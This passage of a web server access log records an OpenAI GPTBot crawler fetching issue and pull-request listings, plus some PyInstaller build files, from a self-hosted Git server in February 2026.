+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:19:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10079] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10088] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10047] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=closed&type=all" -[17/Feb/2026:19:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:19:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:19:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 14064] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:19:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15230] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:19:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:19:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20387] [Gzip 9.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:19:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:19:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" -[17/Feb/2026:19:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" -[17/Feb/2026:19:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" -[17/Feb/2026:19:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:19:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" -[17/Feb/2026:19:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:19:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr 